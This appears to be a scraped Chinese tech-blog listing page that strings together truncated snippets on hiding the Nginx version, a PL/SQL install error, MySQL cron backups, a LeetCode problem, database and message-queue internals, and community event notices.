只是隐藏 Nginx 版本号&#xff0c;只需在 Nginx 配置文件全局段添加 server_tokens off 然后重启 Nginx 服务 默认安装好了的 Nginx 服务 查看版本 现在修改配置 重启 Nginx 版本信息看不到了 我们下期见&#xff0c;拜拜&#xff01;

Win11安装Plsql140报错2503

一、安装异常 二、解决办法 出现上述问题&#xff0c;主要是因为msi包安装的权限问题&#xff0c;使用管理员权限安装即解决 。cmd控制台以管理员身份打开WINR&#xff09;->(SHIFTCTRLRNTER)&#xff0c;进入到msi安装包目录下&#xff0c;以管理员身份安装即可&#xff1…

mysql数据库:使用 bash脚本 + 定时任务 自动备份数据

mysql数据库&#xff1a;使用 bash脚本 定时任务 自动备份数据 1、前言2、为什么需要自动化备份&#xff1f;3、编写备份脚本4、备份脚本授权5、添加定时任务6、重启 crond / 检查 crond 服务状态7、备份文件检查 &#x1f496;The Begin&#x1f496;点点关注&#xff0c;收藏…

LeetCode28.找出字符串中第一个匹配项

28.找出字符串中第一个匹配项 给你两个字符串 haystack 和 needle &#xff0c;请你在 haystack 字符串中找出 needle 字符串的第一个匹配项的下标&#xff08;下标从 0 开始&#xff09;。如果 needle 不是 haystack 的一部分&#xff0c;则返回 -1 。 示例 1&#xff1a; 输入…

“优化消费环境 维护消费者权”荥阳市城关乡社工站开展3·15宣传志愿活动

又是一年“315”&#xff0c;为提高辖区群众消费维权意识&#xff0c;让他们可以学会运用政策法律知识维护自身合法权益&#xff0c;同时也为营造出辖区良好营商环境。2024年3月15日&#xff0c;在荥阳市民政局、荥阳市市场监督管理局、城关乡人民政府的支持下&#xff0c;城关…

“值此春意,共享蓝天”—携手植新绿·静待成荫时

种竹交加翠&#xff0c;栽桃烂漫红。——唐杜甫《春日江村》 春风十里&#xff0c;万物生长。春风吹拂绿色现&#xff0c;树吐嫩芽花鲜艳。植树正是好季节&#xff0c;男女老少齐挥铲。种下棵棵小树苗&#xff0c;辛勤培育勤浇灌。来年长成苍天木&#xff0c;绿树成荫美景见。 …

基于ElasticSearch存储海量AIS数据:时空立方体索引篇

文章目录 引言I 时间维切分II 空间范围切分引言 索引结构制约着查询请求的类型和处理方式,索引整体架构制约着查询请求的处理效率。随着时间推移,AIS数据在空间分布上具备局部聚集性,如 果简单地将所有AIS数据插入一个索引结构,随着数据量增长,索引的更新效率、查询效率及…

RabbitMQ 模拟实现【六】:程序模拟实现

文章目录 模拟实现模拟消费者模拟生产者效果展示 启动结果如下&#xff1a; ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/71841546ad8043f1bd51e4408df791de.png)![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/f6e3e72ff9a4483c978ec48e24f075c2.p…

OceanBase原理之内存管理

第1章 前言 1.1 多租户管理简介 OceanBase数据库中&#xff0c;应用了单集群多租户的设计&#xff0c;使得一个集群内能够创建多个彼此独立的租户。在OceanBase数据库&#xff0c;租户成为了资源分配的单位&#xff0c;同时还是数据库对象管理和资源管理的基础。 在某种程度…

桌面备忘录,电脑桌面备忘录怎么设置

在当今快节奏的生活中&#xff0c;备忘录成为了人们工作和生活中不可或缺的工具。然而&#xff0c;随着科技的发展&#xff0c;纸质备忘录逐渐被电子桌面备忘录所取代。在电脑桌面设置备忘录&#xff0c;可以更加高效地管理任务和提醒事项。 电脑桌面是我们日常工作和娱乐的主…